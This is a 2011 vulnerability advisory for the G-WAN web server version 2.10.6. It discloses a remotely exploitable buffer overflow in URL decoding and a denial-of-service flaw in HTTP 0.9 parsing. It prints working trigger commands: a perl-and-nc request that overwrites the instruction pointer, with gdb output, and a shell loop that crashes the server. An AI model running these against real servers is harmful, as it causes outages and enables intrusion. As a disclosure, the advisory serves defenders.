========================================================================
Title: Multiple G-WAN vulnerabilities

Product: G-WAN (http://gwan.com/)

Author: Fredrik Widlund
E-mail: fredrik.widlund (at) gmail (dot) com

Date: 2011-10-12
========================================================================

1. BACKGROUND

"G-WAN is much smaller, faster and safer than the next best:
- Web servers,
- Web applications servers,
- Web acceleration servers,
- KV stores & noSQL databases." (from gwan.com)

2. DESCRIPTION

Problems exist with design issues, parsing, signal handling, and
buffer management.

A) A buffer overflow issue exists in the routine handling URL encoding
for the "csp" (so called G-WAN servlets) sub-directory. Exploiting the
vulnerability results in remotely being able to execute shellcode on
the system.

B) SIGPIPE signals were not handled correctly. Exploiting the
vulnerability resulted in denial of service.

C) Several minor issues.

3. DETAILS

The vulnerabilities were discovered and successfully exploited on an
Arch Linux 64-bit system running a Linux 3.0.6 kernel with ASLR
enabled.

A)
> perl -e "print 'GET /csp/','A'x1200,\" HTTP/1.0\r\n\r\n\"" | nc localhost 80
[...]
G-WAN 2.10.6 (pid:9167)
[New LWP 9169]
Program received signal SIGSEGV, Segmentation fault.
[Switching to LWP 9169]
0x41414141 in ?? ()
(gdb) i r
eax            0x31     49
ecx            0x81f2298        136258200
edx            0x0      0
ebx            0x41414141       1094795585
esp            0xf7da51f0       0xf7da51f0
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
eflags         0x10202  [ IF RF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

A proof of concept exploit was created brute forcing the ASLR stack
offset which leads to a vulnerable system being compromised remotely
in less than 5 minutes, sending a request each second at the most to
avoid the G-WAN watchdog giving up.

B)
The routines for parsing HTTP 0.9 were broken resulting in a
infinitely looping reply. Repeatedly interrupting such loops will
quickly result in denial of service.

> while :; do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n" | timeout 0.01 nc localhost 80 ; done
[...]
G-WAN 2.10.6 (pid:3948)
[New LWP 3951]
Program received signal SIGPIPE, Broken pipe.
[Switching to LWP 3951]
0xf7ffd430 in __kernel_vsyscall ()

4. AFFECTED VERSIONS

G-WAN 2.10.6 (October 6, 2011).

There is no archive of older versions available and the vendor refuses
to cooperate or acknowledge the issues.

5. SOLUTIONS

The issues seems to be resolved. Upgrade to the latest version.

6. REFERENCES

* http://gwan.com
* http://lonewolfer.wordpress.com/2011/10/10/intermezzo-about-stability-and-compliance/
* http://lonewolfer.wordpress.com/2011/10/10/intermezzo-about-stability-and-compliance-part-2/

========================================================================
Fredrik Widlund
fredrik.widlund (at) gmail (dot) com